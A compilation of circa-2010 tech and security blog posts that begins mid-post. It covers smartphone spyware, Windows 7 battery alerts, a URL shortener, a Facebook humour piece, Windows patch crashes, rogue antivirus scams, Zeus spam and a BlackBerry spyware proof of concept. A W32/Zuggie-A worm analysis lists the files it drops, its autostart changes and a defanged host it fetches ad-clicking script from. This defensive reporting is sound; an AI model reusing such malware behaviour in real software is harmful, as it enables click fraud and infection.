For example, it is very easy to develop a game which sends SMS messages to buy additional game credits but at the same time forwards every received SMS-message to third party effectively creating a spyware application. As soon as the verification is not possible an element of trust kicks in. It is less likely that established developers will risk their own reputation to include a Trojan with their own product. That is why users should be careful when installing new applications from new and untrusted developers.

Once the rogue application is discovered a publishers certificate can be revoked, but it is too easy to enter the market again under a different name with the cost of obtaining a key being so low.

So, spyware for mobile phones of the recent generation, I suppose we can call them smartphones is possible. I am afraid that I fail to grasp the novelty. First malware for phones based on Symbian platform (still the most popular in the world, though the support is dwindling) appeared more than 6 years ago and we have not seen an explosion of malware as we have seen on Windows based personal computers.

I suspect that the reason lies in the lack of one leading mobile platform like on desktop which means that we will not see a deluge of malware for mobile phones before one of the platforms prevails. Of course, that does not mean we will not see an occasional outbreak or targeted attack here and there. We should always be cautious when installing new applications and aware that any new application is a potential security risk.

Gloomy predictions often serve for increasing awareness of one’s research and there is nothing wrong with that, although publishing of the spyware source code is a bit contentious (a point for an entirely different blog post) since the source can be easily changed by script kiddies to create new malware. We can only hope that these gloomy predictions will not become a gloomy reality and if they do SophosLabs will make sure you are protected, as usual.

Windows 7’s strange Battery Notification isn’t any error but a Feature

Many users have complained about Windows 7 strange Battery notification saying “Consider replacing your Batteries” on Laptops and there was a noise about it in Blogosphere but Microsoft has replied to it. There were many Forum posts and blog articles implying Windows 7 is falsely reporting this situation or even worse, causing these batteries to fail.

After upgrading to Windows 7, Many users are seeing a pop-up window that suggests they “consider replacing” their battery, as capacity has slipped below the 40 per cent level. Butt, official MSDN blog has confirmed that Windows 7 isn’t killing Laptop batteries or causing them to fail but it’s a new intelligent feature of Windows 7.

The post says- “PC batteries inherently degrade in their ability to hold a charge and provide power (as is the case for all rechargeable batteries). The cause of this is complex and includes irreversible changes in battery chemistry, and increased internal resistance among other things and those in turn are dependent on the design and manufacturing of the battery.” It means that Batteries degrade with time and this degradation translates into less battery life for the user over the life of the battery in the PC.

Windows 7 makes use of a feature of modern laptop batteries which have circuitry and  firmware that can report to Windows the overall health of the battery. This is reported in absolute terms as Watt-hours (W-hr) power capacity. Windows 7 then does a simple calculation to determine a percentage of degradation from the original design capacity. In Windows 7 we set a threshold of 60% degradation (that is the battery is performing at 40% of its designed capacity) and in reading this Windows 7 reports the status to you.  At this point, for example, a battery that originally delivered 5 hours of charge now delivers, on average, approximately 2 hours of charge.  The Windows 7 the notification is a battery meter icon and notification with a message “Consider replacing your battery”.

Still, Microsoft said it would continue to look into the issue, and asked anyone receiving the warning to let it know on its forums.

Shorten your own URLs

“YOURLS is a small set of PHP scripts that will allow you to run your own URL shortening service (a la TinyURL). You can make it private or public, you can pick custom keyword URL. It comes with its own API.”
http://yourls.org/

It’s installed on your web server (needs PHP 4.3 or better and MYSQL 4.1 with mod_rewrite enabled.)

“Benefits:

1. Not reliant on third party service
2. Sends link juice to your domain, not a service provider
3. Customize your short links
4. Build your brand (showing your URL)”

Story here.

Cool.

Top 4 most annoying Facebook couples

(CNN)(The Frisky) -- For anyone who is remotely active on Facebook, you no doubt have been faced at some point with inane updates on one of your friend's kid's colds or how wedding-planning was coming along for one of your engaged buddies.

That's why, when parenting Web site Babble published "Facebook's Most Annoying Parents," I immediately thought, "But what about all the annoying couples?" So, without further ado, I present to you the top four most annoying couples on Facebook.


The too-much-in-love couple

Between the constant "I love my honey sooooo much!!" and "I have the most amazing husband in the whole world!!!" updates, these couples do proclaim too much.
Their updates are filled with flowery adjectives and almost always include the words "amazing," "luckiest," and "best! ever!" Sometimes the updates are even addressed to each other, like, "Kelly, it was exactly two months ago today I met you and became the luckiest man in the universe!" or "Mark, I loved every amazing second of our beautiful weekend together!!"

Don't these people have personal email addresses? Can't they actually speak to one another in person and leave the rest of us out of it? But, of course, all these proclamations aren't for their benefit, they're for ours.
We're supposed to feel jealous of their burning love for one another and their incredible luck to have found each other. Unfriend!


The pathetic couple

Outside of their relationship, this couple is miserable and empty. If either of them so much as works outside the home and they're forced to spend eight hours apart, their updates are peppered with hourly countdowns until their end-of-the-day reunion.

The Frisky: Free teeth whitening (for your Facebook photos)

If one gets invited to a function without the other, they use their Facebook update to announce how unfair the world is and how nothing else in life is as important as the time they spend with each other.
"I have to go to my BFF's bachelorette party tonight, which means a whole evening without Nick! No fair!!!" How these couples ever managed to survive in the world without each other is one of the great mysteries of life.


The boring couple

It's clear that the Boring Couple, who does nothing but constantly hang out at home, has forgotten that other people actually have fun for fun. They update with: "Excited to stay in for 'movie and pizza night' with the hubby!" or "Gonna cook a big dinner for wifey tonight!!"

Well, hey, guess what, the rest of us are going to eat dinner at some point, too, and unless it's enjoyed with a mentor we've just been granted a meal with from the Make-A-Wish foundation, it probably doesn't warrant two exclamation points...or, you know, a status update on Facebook. These people would be more sad than annoying if they weren't so smug about their domestic bliss.

The Frisky: Are social media sites making us rude?


The passive-aggressive couple


Perhaps the biggest offender of them all, this couple hashes out their issues with one another in passive-aggressive, embarrassing, and often melodramatic updates, like "Would have gotten a lot more sleep if somebody didn't keep me up all night with his constant farting!" or "There's nothing I hate more than a man who can't make up his mind which he woman he wants!"

Every other day your feed is cluttered with messages that they've broken up or gotten back together. At least you can take comfort in knowing that they totally deserve each other.

Escort service infected with Troj/JSRedir-AR

Clients of escorts and call girls are usually aware of the the risks presented from STIs. However, SophosLabs has been monitoring a different type of infection risk for clients of escorts in Indian cities.

The Troj/JSRedir-AR infection has morphed slightly:

If you look at the variable ‘o[e]‘ (two-thirds of the way down) you will see the beginnings of an obfuscated string ‘http://’. Previous versions of Troj/JSRedir-AK and Troj/JSRedir-AR have used non-alphanumeric characters to disguise the strings.

Facebook Chat is now accessible on popular instant messaging clients

Making good on a promise delivered just about one year ago, Facebook announced that its popular chat feature can now be accessed through any Jabber (XMPP)-compatible desktop instant messaging software, including AIM, iChat, Pidgin, Adium, Miranda, Trillian and...

Users can simply connect their Facebook account with their instant messaging client of choice and they can then chat with Facebook friends without having to stay logged into the social networking site.

Further, Facebook Chat has been integrated into the Facebook Connect platform for developers so other services wishing to integrate instant messaging into their sites.

Last June, Facebook's chat service reached the milestone of 1 billion messages being exchanged in a single day, and its growth has continued.

WinXP users: hold off on installing MS010–15 [BSOD]

Security blogger Brian Krebs is reporting that some Windows XP users are reporting blue screen of death on reboot after installing Microsoft’s Tuesday patch KB977165 (MS010–15: “Vulnerabilities in Windows kernel could allow elevation of privilege.”)

“Turns out, a non-trivial number of XP users are reporting that their systems suffer from the dreaded Blue Screen of Death (BSoD) and fall into an interminable reboot loop after installing the latest batch of patches from Redmond,” he wrote.

Brian Krebs’ blog here.

Those trying to maintain Microsoft systems are caught in the cross-currents of the patching process: some patches might be buggy (think “delay”) but the dark side will be reverse engineering the patches as fast as they can (do it now.)

It almost seems like it would be a good idea for the users of Microsoft products to hold off about two days before installing the Patch Tuesday updates. That seems to be how long it takes for the word to get out – like this problem – that there are glitches in the updates.

The overwhelming number of Microsoft fixes are straightforward and urgently needed security measures. However, the massive complexity presented by the older flavors of the Windows operating system and service pack levels almost guarantees that there are going to be problems like this.

Possibly a good strategy would be phased updates especially for enterprise systems:

-- Immediately install just the patches that fix vulnerabilities with in-the-wild exploits if you are running the vulnerable applications, modules, plug-ins, etc.

-- Wait three days for all others

-- Wait a week for non-critical (no reported exploits) updates to less-used flavors of Windows and less-used applications.

Meanwhile, have someone keep an eye on the security news sources to spot problems like this one.

Krebs’ blog carries some good, detailed advice for those whose machines have been disabled already by the glitch.

Computer World carried a story about the problem and noted:

“This was not the first time that a Microsoft update has incapacitated Windows PCs. Two years ago, a set of updates for Vista sent an unknown number of machines into an endless series of reboots. Similar problems stymied users who tried to upgrade to Windows XP Service Pack 3 (SP3) in May 2008, and others attempting to upgrade from Vista to Windows 7 last October.”

Today Softpedia carried a statement from Jerry Bryant, Microsoft's senior security communications manager lead:
“We are aware that after installing the February security updates a limited number of users are experiencing issues restarting their computers. Our initial analysis suggests that the issue occurs after installing MS10-015 (KB977165). However, we have not confirmed that the issue is specific to MS10-015 or if it is an interoperability problem with another component or third-party software. Our teams are working to resolve this as quickly as possible. We also stopped offering this update through Windows Update as soon as we discovered the restart issues. However, those using enterprise deployment systems such as SMS or WSUS will still see and be able to deploy these packages.” 

New Rogue: SecurePcAv

SecurePcAv is a phony antivirus program that has been infecting PC's across the interwebs in recent days.

If your PC is infected with SecurePcAv you will most likely experience the following:

• Fake system scans that report numerous infections and refuses to remove the supposed infections until you buy the phony software.
• Alerts and warnings stating the PC is under attack or unprotected and recommends you buy the phony software.
• Other software will not work, when attempting to open programs a warning stating the program is infected appears and the software is closed.
• Web browser hijacking, redirecting the user to malicious websites or showing false security warnings on sites like Google.com.

Zeus - Exploiting Spear Phishing to Spear Phish

The Zeus crimeware family has moved into new territory with its latest spam campaign - purporting to be a warning about targeted phishing attacks on “.gov” and “.mil” domains, by Zeus Trojans no less!
In fact, one of the latest spam samples we’ve seen, duplicates the title and first three paragraphs of a blog entryby well-known security expert Brian Krebs, which discusses a previous iteration of this Zeus attack. As seen below, the spam sample starts off with the same three lines of the blog post, before starting into the phony KB content and links that lead to Zeus malware.

Note that while reports on the initial campaign suggest only “.gov” and “.mil” addresses were targeted, we have seen these later samples from a wider variety of sources.

New Rogue: Paladin Antivirus

Paladin Antivirus is a phony security program, designed to rip people off. Paladin Antivirus tricks people into thinking they are downloading a legit antivirus software, then continually displays false security alerts and warnings followed up with a requests for users to buy or register the software.

Once a computer becomes infected with Paladin Antivirus it will instantly begin a system scan and will report multiple infections. Paladin Antivirus will refuse to remove any of these supposed infections until the user buys or "registers" the software. Do not fall for this scam.

Paladin Antivirus will also use pop-up system warnings and alerts stating the PC is has numerous infections or is under attack and suggests purchase of the software to ensure protection.

Unfortunately if you fall for the Paladin Antivirus scam, you will quickly learn you have been ripped off. Paladin Antivirus will not prevent infections nor will it remove existing infections. Paladin Antivirus is an infection in itself.

If your computer is infected with this malware, you should remove it soon, see Virus Removing to learn how to remove it.

History of the Internet

Have you ever wondered how Internet initiated 50 years ago in 1957? Below is a nice video which depicts how the Internet changed with respect to time in modern age. Must check it out!



Hope you liked watching this video!

New Google Chrome Beta for Mac gets Extensions

Google launched the Mac version of its Chrome browser in Dec 2009. A new beta build is now available which offers new features like extensions, bookmark sync, and more.

Now you’ll be able to install any of over 2,200 extensions currently available in Chrome’s extensions gallery. Extensions can add useful, informative,fun, or quirky functionality to your chrome browser. It also adds bookmark and cookie managers in a way that feels completely at home on the Mac

Download: You can download Google Chrome Beta for Mac or update your current chrome build.

The Buzz is getting LOUDER

It has been barely two days since Google announced their new social integration and messaging tool called Google Buzz. Today we saw the first example of malware, W32/Zuggie-A, pretending to be Google Buzz.
Analysis of W32/Zuggie-A gives the impression of a hastily assembled worm, really a modification of the W32/SillyFDC family of worms but with a twist.
When W32/Zuggie-A is installed, it creates the following files:

• Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content\timer.xul
• Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome.manifest
• Program Files\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\install.rdf
• System\googlebuzz.exe - copy of W32/Zuggie-A
• System\GoogleUpte.exe - copy of W32/Zuggie-A

W32/Zuggie-A modifies the registry to autostart GoogleUpte.exe and googlebuzz.exe.
A quick search shows that the CLSID: 9CE11043-9A15-4207-A565-0C94C42D590D has previously been seen in multiple worms. This supports my theory that this is a hastily assembled worm built from recycled malware. I fired up a copy of Firefox on the infected machine and, as determined from analysis, found an installed Firefox extension called Firefox security 2.0 - Internal security options editor under the extensions tab of Firefox Add-ons.
This “security extension” has added a JavaScript (timer.xul), which is triggered when the browser queries: yahoo.com, bing.com, google.com, aol.com/aol/search, ask.com and executes JavaScript hosted on:
searchrequest1 . com / request . php ? aid = blackout
which will silently click all Google or Yahoo Ads. displayed on the search results page (hey why not make a few bucks while infecting eh?).
Google Buzz is new and is garnering quite a bit of interest and adoption among Internet users including myself. Clearly the malware authors view Google Buzz as the fresh big lucrative social fruit to exploit much like they have done with Facebook, MySpace, Hi5 and others. So in the coming weeks and months I predict we will see a host of new malware exploiting or attempting to exploit Google Buzz as the malware authors  figure out its internals. This may have only been an exploratory attempt or a quick response to the latest craze - only time will tell.

Between a PoC and a Hard Place

Several reports have been published detailing a Blackberry proof of concept (PoC) exploit called txsBBSpy that was recently presented at a security conference. Although it may not have been the aim of the original presenter, some reports have framed the PoC as being able to exploit so-called vulnerabilities that the writers believe to be present in the Blackberry platform. The “vulnerabilities” involve secretly forwarding incoming emails, locating devices by way of their GPS capabilities, eavesdropping on conversations by surreptitiously turning on microphones, and other such nefarious behavior.
Although the vectors used for the PoC itself weren’t exactly ground-breaking it does highlight the fact that competition between mobile platform vendors to provide easy-to-use APIs (and thus attract developers) has made it possible to write malicious applications for mobile devices in less time than ever before.
So, does this mean the existence of easy-to-use APIs makes mobile devices unsafe? The answer is: not really. While over the years it has become easier to work with mobile development platforms, and the amount of time it takes to bring a new and fully featured software product to market has decreased, this has also meant that platform vendors have simultaneously had to introduce steps to ensure that new API features are not being used for malicious purposes.
Vendors take different approaches to ensuring the security and integrity of applications written for mobile platforms, such as restricting application security policies, providing a single point of distribution, mandating application signing, and restricting applications that may be installed to those that have been approved (with the possibility of future revocation if an application is found to be questionable). However, these steps can never be 100% reliable, and as such, situations may arise in which malicious applications sneak through, as happened last year. This is where the case for mobile security products can be made.
Some simple precautions that end users can take include:
•    Watch out for unusually high battery consumption. Although this sounds simple, many threats written for mobile platforms are not designed to run efficiently, which means that resource usage can be extremely high.
•    Be sure to check the device’s Bluetooth settings. Ensure that devices are set to be “hidden” and not “discoverable.”
•    Keep track of your normal levels of data usage and contact your service provider if you become aware of significant increases that you cannot account for.
•    Report any prompts to send premium-rate messages.
•    Periodically confirm the applications installed on your mobile device and report any entries you did not specifically approve.
•    Avoid granting “Trusted Application” status unless absolutely required, which may allow malicious code access to confidential data:

As more and more developers move towards mobile application development, mobile devices are becoming ever more sophisticated and are increasingly being used to store critical personal data. Mobile device manufacturers will have to walk the fine line between providing comprehensive APIs and preventing malicious applications from gaining unfettered access to user content and other potentially sensitive data.